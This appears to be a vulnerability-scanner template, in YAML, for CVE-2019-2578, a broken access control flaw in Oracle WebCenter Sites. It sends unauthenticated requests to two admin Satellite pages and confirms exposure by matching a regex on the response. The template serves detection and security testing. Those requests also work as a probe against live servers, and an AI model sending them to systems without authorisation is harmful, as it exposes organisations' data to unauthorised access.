31 lines
1.1 KiB
YAML
31 lines
1.1 KiB
YAML
id: CVE-2019-2578
|
|
|
|
info:
|
|
name: Broken Access Control Oracle WebCenter Sites
|
|
author: leovalcante
|
|
severity: high
|
|
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
|
|
reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
|
tags: cve,cve2019,oracle,wcs,auth-bypass
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
cvss-score: 8.60
|
|
cve-id: CVE-2019-2578
|
|
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- '<script[\d\D]*<throwexception/>' |